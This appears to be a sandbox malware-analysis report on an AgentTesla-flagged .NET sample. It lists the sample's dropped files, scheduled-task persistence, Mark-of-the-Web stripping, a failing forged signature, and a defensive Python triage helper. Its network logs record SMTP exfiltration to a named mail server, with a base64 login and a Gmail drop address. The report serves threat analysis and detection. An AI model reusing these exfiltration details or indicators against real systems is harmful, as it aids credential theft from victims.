                                                                    File Type:XML 1.0 document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1604
                                                                    Entropy (8bit):5.129841701305694
                                                                    Encrypted:false
                                                                    SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt6Vxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuT6rv
                                                                    MD5:5D44DB3EA674A9900AD40FD31E5379A2
                                                                    SHA1:D287AE29F1853FC670DD5540DD4CB4C8B00BA555
                                                                    SHA-256:54C72FD81101EB71569F59BBEAB249E80A83734D4ECA34637483B5DBA72639C5
                                                                    SHA-512:10640D1FF277DC723595E0EE35A25CB4C9AB27BEC4E276C2A0BBE395E3E172CC1CFAF5A58B4C0FDEC7C7FE9837559D5047BF1E299CF8BA34C6174332275DCC08
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                                    Process:C:\Users\user\Desktop\AWB#150332.exe
                                                                    File Type:XML 1.0 document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1604
                                                                    Entropy (8bit):5.129841701305694
                                                                    Encrypted:false
                                                                    SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt6Vxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuT6rv
                                                                    MD5:5D44DB3EA674A9900AD40FD31E5379A2
                                                                    SHA1:D287AE29F1853FC670DD5540DD4CB4C8B00BA555
                                                                    SHA-256:54C72FD81101EB71569F59BBEAB249E80A83734D4ECA34637483B5DBA72639C5
                                                                    SHA-512:10640D1FF277DC723595E0EE35A25CB4C9AB27BEC4E276C2A0BBE395E3E172CC1CFAF5A58B4C0FDEC7C7FE9837559D5047BF1E299CF8BA34C6174332275DCC08
                                                                    Malicious:true
                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:modified
                                                                    Size (bytes):45984
                                                                    Entropy (8bit):6.16795797263964
                                                                    Encrypted:false
                                                                    SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                                                    MD5:9D352BC46709F0CB5EC974633A0C3C94
                                                                    SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                                                    SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                                                    SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: SOA_9828392091.exe, Detection: malicious, Browse
                                                                    • Filename: ngPebbPhbp.exe, Detection: malicious, Browse
                                                                    • Filename: Pi648je050.exe, Detection: malicious, Browse
                                                                    • Filename: shipping documents.exe, Detection: malicious, Browse
                                                                    • Filename: Termination_List_November_2024_pdf.exe, Detection: malicious, Browse
                                                                    • Filename: Payment_Advice_USD_48,054.40_.exe, Detection: malicious, Browse
                                                                    • Filename: M1Y6kc9FpE.exe, Detection: malicious, Browse
                                                                    • Filename: mJIvCBk5vF.exe, Detection: malicious, Browse
                                                                    • Filename: 1aG5DoOsAW.exe, Detection: malicious, Browse
                                                                    • Filename: copto de pago.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
                                                                    Process:C:\Users\user\Desktop\AWB#150332.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1061896
                                                                    Entropy (8bit):7.1796313022888985
                                                                    Encrypted:false
                                                                    SSDEEP:12288:npZsS/+l1pZQw1IvCtrVakpFGojVg3bInwCSfJqni4XVXlfo6jPIl0OmiWjKy9Uj:nzsBpz1/tr91jnw7Yi4XRxPjPIKiWjM
                                                                    MD5:DEF8249DC6DF546F68CE491EE14282C9
                                                                    SHA1:FDAAF599B51A6D13DDA0BADA44108DCA334EDDDC
                                                                    SHA-256:63382A3CC1E90E7DFA54826A62BFB5DA86F4AD44A07CFFCA70FA3C509BBD5AD7
                                                                    SHA-512:C181330B79CCDDC07C425172D83A48B29546F7197FAB39A952C3DB2C0E7B702368B10184E4A35CF2777F996D76FB80324A8DEE70E6F641C085D7965AD9BB5E84
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 26%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....9...............0.............j.... ... ....@.. .......................`............@.....................................O.... ...................6...@..........p............................................ ............... ..H............text...p.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................J.......H........x..........7...@~...|...........................................0.............o.....8.....o....t.......u.........,@..t......o....r...po....-..o....r...po....+......,....o.......+&.u...........,...t........o....(........o....:t......u........,...o......*...................0...........#........}.....#........}.....#........}.....#.....L.@}......}......}.....s....}.....s....}.....sG...}.....sM...}......}......}.....(.......(.......{....(.......{!...(.......{....(.......
                                                                    Process:C:\Users\user\Desktop\AWB#150332.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                    Process:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1141
                                                                    Entropy (8bit):4.442398121585593
                                                                    Encrypted:false
                                                                    SSDEEP:24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
                                                                    MD5:6FB4D27A716A8851BC0505666E7C7A10
                                                                    SHA1:AD2A232C6E709223532C4D1AB892303273D8C814
                                                                    SHA-256:1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
                                                                    SHA-512:3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
                                                                    Malicious:false
                                                                    Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c
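Three of the dropped files above carry the evidence behind the signatures "Hides that the sample has been downloaded from the Internet (zone.identifier)", "Scheduled temp file as task from temp location" and the self-copy of the sample to a user-writable path: the 26-byte `[ZoneTransfer]` stream with `ZoneId=0`, the Task Scheduler XML with an enabled `LogonTrigger`, and a dropped PE whose SHA-256 equals the submitted sample's. The following triage helper is an added example (not Joe Sandbox code and not part of this report) that parses those three artifact types and turns them into findings. Its inputs are constructed from the previews on this page; the `<Actions>`/`<Exec>` element of the task XML is not visible in the truncated preview, so the command path used there is an assumption for the example only.

```python
"""Triage helpers for dropped-file artifacts of the kind listed in this report.
Added example; inputs below are constructed from the report previews."""
import configparser
import xml.etree.ElementTree as ET

# SHA-256 of the submitted sample, as stated in this report
SAMPLE_SHA256 = "63382a3cc1e90e7dfa54826a62bfb5da86f4ad44a07cffca70fa3c509bbd5ad7"

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
# URLZONE values used in the Zone.Identifier alternate data stream
ZONES = {0: "LocalMachine", 1: "Intranet", 2: "Trusted", 3: "Internet", 4: "Restricted"}


def parse_zone_identifier(stream: bytes) -> dict:
    """Parse a Zone.Identifier ADS; it is an INI file with a [ZoneTransfer] section."""
    cp = configparser.ConfigParser()
    cp.read_string(stream.decode("ascii", errors="replace"))
    zone = int(cp["ZoneTransfer"]["ZoneId"])
    return {
        "zone_id": zone,
        "zone": ZONES.get(zone, "Unknown"),
        # SmartScreen / Mark-of-the-Web handling applies to Internet (3) and
        # Restricted (4); a sample writing 0 removes that protection from its copy.
        "motw_stripped": zone < 3,
    }


def parse_task_xml(xml_text: str) -> dict:
    """Extract the persistence-relevant fields from a Task Scheduler definition."""
    # Encode as UTF-16 so the bytes match the file's own encoding declaration
    root = ET.fromstring(xml_text.encode("utf-16"))
    enabled = []
    triggers = root.find(TASK_NS + "Triggers")
    for trig in (triggers if triggers is not None else []):
        flag = trig.find(TASK_NS + "Enabled")
        # The schema treats a missing <Enabled> as true
        if flag is None or (flag.text or "").strip().lower() == "true":
            enabled.append(trig.tag.replace(TASK_NS, ""))
    principal = root.find(f"{TASK_NS}Principals/{TASK_NS}Principal")
    run_level = principal.findtext(TASK_NS + "RunLevel") if principal is not None else None
    user = principal.findtext(TASK_NS + "UserId") if principal is not None else None
    commands = [c.text.strip() for c in
                root.findall(f"{TASK_NS}Actions/{TASK_NS}Exec/{TASK_NS}Command") if c.text]
    return {"enabled_triggers": enabled, "run_level": run_level,
            "user": user, "commands": commands}


def find_sample_copies(dropped: list, sample_sha256: str) -> list:
    """Processes that wrote a dropped file byte-identical to the submitted sample."""
    return [d["process"] for d in dropped if d["sha256"].lower() == sample_sha256.lower()]


def triage(zone_stream: bytes, task_xml: str, dropped: list) -> list:
    """Combine the three checks into human-readable findings."""
    findings = []
    z = parse_zone_identifier(zone_stream)
    if z["motw_stripped"]:
        findings.append(f"Zone.Identifier written with ZoneId={z['zone_id']} "
                        f"({z['zone']}): Mark-of-the-Web neutralised")
    t = parse_task_xml(task_xml)
    if "LogonTrigger" in t["enabled_triggers"]:
        user_paths = [c for c in t["commands"]
                      if "\\appdata\\" in c.lower() or "\\temp\\" in c.lower()]
        if user_paths:
            findings.append(f"Logon task ({t['run_level']}, {t['user']}) runs "
                            f"from user-writable path: {user_paths[0]}")
    for proc in find_sample_copies(dropped, SAMPLE_SHA256):
        findings.append(f"Byte-identical copy of the sample dropped by {proc}")
    return findings


# Constructed from the 26-byte Zone.Identifier preview in this report
ZONE_STREAM = b"[ZoneTransfer]\r\nZoneId=0\r\n"

# Constructed task definition modelled on the dropped Task XML preview. The
# <Actions> element is not visible on the page; the Exec command is an assumption.
TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled><UserId>user-PC\\user</UserId></LogonTrigger>
    <RegistrationTrigger><Enabled>false</Enabled></RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec><Command>C:\\Users\\user\\AppData\\Roaming\\nYNBzxFhCu.exe</Command></Exec>
  </Actions>
</Task>"""

# Constructed from two dropped-file entries above (writing process and SHA-256 only)
DROPPED = [
    {"process": "C:\\Users\\user\\Desktop\\AWB#150332.exe",
     "sha256": "63382A3CC1E90E7DFA54826A62BFB5DA86F4AD44A07CFFCA70FA3C509BBD5AD7"},
    {"process": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe",
     "sha256": "2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390"},
]

if __name__ == "__main__":
    for line in triage(ZONE_STREAM, TASK_XML, DROPPED):
        print("-", line)
```

On a live host the same checks map onto `Get-Content -Path <file> -Stream Zone.Identifier`, `Export-ScheduledTask` and a hash comparison against the quarantined sample; the parsers above take exactly those outputs as input.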
                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.1796313022888985
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:AWB#150332.exe
                                                                    File size:1'061'896 bytes
                                                                    MD5:def8249dc6df546f68ce491ee14282c9
                                                                    SHA1:fdaaf599b51a6d13dda0bada44108dca334edddc
                                                                    SHA256:63382a3cc1e90e7dfa54826a62bfb5da86f4ad44a07cffca70fa3c509bbd5ad7
                                                                    SHA512:c181330b79ccddc07c425172d83a48b29546f7197fab39a952c3db2c0e7b702368b10184e4a35cf2777f996d76fb80324a8dee70e6f641c085d7965ad9bb5e84
                                                                    SSDEEP:12288:npZsS/+l1pZQw1IvCtrVakpFGojVg3bInwCSfJqni4XVXlfo6jPIl0OmiWjKy9Uj:nzsBpz1/tr91jnw7Yi4XRxPjPIKiWjM
                                                                    TLSH:A435F63D29BE222BE1B5C3B7CBDBE427F534986F3111AD6458D343A94346A4634C326E
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....9...............0.............j.... ... ....@.. .......................`............@................................
                                                                    Icon Hash:1133333969613167
                                                                    Entrypoint:0x4e146a
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:true
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0xCA399BA7 [Tue Jul 6 04:57:11 2077 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                    Signature Valid:false
                                                                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                    Error Number:-2146869232
                                                                    Not Before, Not After
                                                                    • 12/11/2018 19:00:00 08/11/2021 18:59:59
                                                                    Subject Chain
                                                                    • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                    Version:3
                                                                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                    Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe1416 | 0x4f | .text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe2000 | 0x202d4 | .rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0xffe00 | 0x3608 |
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x104000 | 0xc | .reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0xdfb10 | 0x70 | .text
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                    .text | 0x2000 | 0xdf470 | 0xdf600 | 193dc2b6c242c85884fa9455fe7fbb66 | False | 0.752333476147174 | data | 7.195168556276966 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rsrc | 0xe2000 | 0x202d4 | 0x20400 | c2cfab27fe8f8caf0f22aeae8fd68483 | False | 0.6211997335271318 | data | 6.70138254071251 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc | 0x104000 | 0xc | 0x200 | 07c38555518634dde51acead93d1e41b | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                    RT_ICON | 0xe21f0 | 0xb8aa | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 1.0002961458729958
                                                                    RT_ICON | 0xeda9c | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.3685821601798178
                                                                    RT_ICON | 0xfe2c4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.5408713692946058
                                                                    RT_ICON | 0x10086c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.6803470919324578
                                                                    RT_ICON | 0x101914 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.8049645390070922
                                                                    RT_GROUP_ICON | 0x101d7c | 0x4c | data | | | 0.75
                                                                    RT_VERSION | 0x101dc8 | 0x320 | data | | | 0.4525
                                                                    RT_MANIFEST | 0x1020e8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                                                    DLL | Import
                                                                    mscoree.dll | _CorExeMain
                                                                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                    2024-12-04T12:52:54.945943+0100 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.7 | 49710 | 193.141.65.39 | 587 | TCP
                                                                    2024-12-04T12:52:54.945943+0100 | 2839723 | ETPRO MALWARE Win32/Agent Tesla SMTP Activity | 1 | 192.168.2.7 | 49710 | 193.141.65.39 | 587 | TCP
                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Dec 4, 2024 12:53:05.308562994 CET | 49707 | 587 | 192.168.2.7 | 193.141.65.39
                                                                    Dec 4, 2024 12:53:05.428525925 CET | 587 | 49707 | 193.141.65.39 | 192.168.2.7
                                                                    Dec 4, 2024 12:53:05.428652048 CET | 49707 | 587 | 192.168.2.7 | 193.141.65.39
                                                                    Dec 4, 2024 12:53:10.995049000 CET | 49707 | 587 | 192.168.2.7 | 193.141.65.39
                                                                    Dec 4, 2024 12:53:11.457041979 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39
                                                                    Dec 4, 2024 12:53:11.577255964 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7
                                                                    Dec 4, 2024 12:53:11.580701113 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39
                                                                    Dec 4, 2024 12:53:13.343214035 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7
                                                                    Dec 4, 2024 12:53:13.344149113 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39
                                                                    Dec 4, 2024 12:53:13.464041948 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7
                                                                    Dec 4, 2024 12:53:13.831944942 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7
                                                                    Dec 4, 2024 12:53:13.833244085 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39
                                                                    Dec 4, 2024 12:53:13.953227997 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7
                                                                    Dec 4, 2024 12:53:14.319787979 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7
                                                                    Dec 4, 2024 12:53:14.346460104 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39
                                                                    Dec 4, 2024 12:53:14.466371059 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7
                                                                    Dec 4, 2024 12:53:14.849009991 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7
                                                                    Dec 4, 2024 12:53:14.849431992 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39
                                                                    Dec 4, 2024 12:53:14.969274044 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7
                                                                    Dec 4, 2024 12:53:15.336148977 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7
                                                                    Dec 4, 2024 12:53:15.336503983 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39
                                                                    Dec 4, 2024 12:53:15.456528902 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7
                                                                    Dec 4, 2024 12:53:26.323152065 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7
                                                                    Dec 4, 2024 12:53:26.324940920 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39
                                                                    Dec 4, 2024 12:53:26.444688082 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7
                                                                    Dec 4, 2024 12:53:26.814351082 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7
                                                                    Dec 4, 2024 12:53:26.815817118 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39
                                                                    Dec 4, 2024 12:53:26.815896988 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39
                                                                    Dec 4, 2024 12:53:26.815912962 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39
                                                                    Dec 4, 2024 12:53:26.815933943 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39
                                                                    Dec 4, 2024 12:53:26.935693026 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7
                                                                    Dec 4, 2024 12:53:26.935709000 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7
                                                                    Dec 4, 2024 12:53:26.935820103 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7
                                                                    Dec 4, 2024 12:53:26.935830116 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7
                                                                    Dec 4, 2024 12:53:27.555697918 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7
                                                                    Dec 4, 2024 12:53:27.601943016 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39
                                                                    Dec 4, 2024 12:54:51.289989948 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39
                                                                    Dec 4, 2024 12:54:51.410550117 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7
                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Dec 4, 2024 12:53:04.796806097 CET | 55571 | 53 | 192.168.2.7 | 1.1.1.1
                                                                    Dec 4, 2024 12:53:05.269452095 CET | 53 | 55571 | 1.1.1.1 | 192.168.2.7
                                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                    Dec 4, 2024 12:53:04.796806097 CET | 192.168.2.7 | 1.1.1.1 | 0xbecc | Standard query (0) | mail.azmaplast.com | A (IP address) | IN (0x0001) | false
                                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                    Dec 4, 2024 12:53:05.269452095 CET | 1.1.1.1 | 192.168.2.7 | 0xbecc | No error (0) | mail.azmaplast.com | | 193.141.65.39 | A (IP address) | IN (0x0001) | false
                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                                    Dec 4, 2024 12:53:13.343214035 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7 | 220 lh222.irandns.com mail server
                                                                    Dec 4, 2024 12:53:13.344149113 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39 | EHLO 932923
                                                                    Dec 4, 2024 12:53:13.831944942 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7 | 250-lh222.irandns.com Hello 932923 [8.46.123.228]
                                                                                                                                                    250-SIZE 524288000
                                                                                                                                                    250-LIMITS MAILMAX=100 RCPTMAX=150
                                                                                                                                                    250-8BITMIME
                                                                                                                                                    250-PIPELINING
                                                                                                                                                    250-PIPECONNECT
                                                                                                                                                    250-AUTH PLAIN LOGIN
                                                                                                                                                    250-STARTTLS
                                                                                                                                                    250 HELP
                                                                    Dec 4, 2024 12:53:13.833244085 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39 | AUTH login aW5mb0Bhem1hcGxhc3QuY29t
                                                                    Dec 4, 2024 12:53:14.319787979 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7 | 334 UGFzc3dvcmQ6
                                                                    Dec 4, 2024 12:53:14.849009991 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7 | 235 Authentication succeeded
                                                                    Dec 4, 2024 12:53:14.849431992 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39 | MAIL FROM:<info@azmaplast.com>
                                                                    Dec 4, 2024 12:53:15.336148977 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7 | 250 OK
                                                                    Dec 4, 2024 12:53:15.336503983 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39 | RCPT TO:<blessedpeter001@gmail.com>
                                                                    Dec 4, 2024 12:53:26.323152065 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7 | 250 Accepted
                                                                    Dec 4, 2024 12:53:26.324940920 CET | 49710 | 587 | 192.168.2.7 | 193.141.65.39 | DATA
                                                                    Dec 4, 2024 12:53:26.814351082 CET | 587 | 49710 | 193.141.65.39 | 192.168.2.7 | 354 Enter message, ending with "." on a line by itself
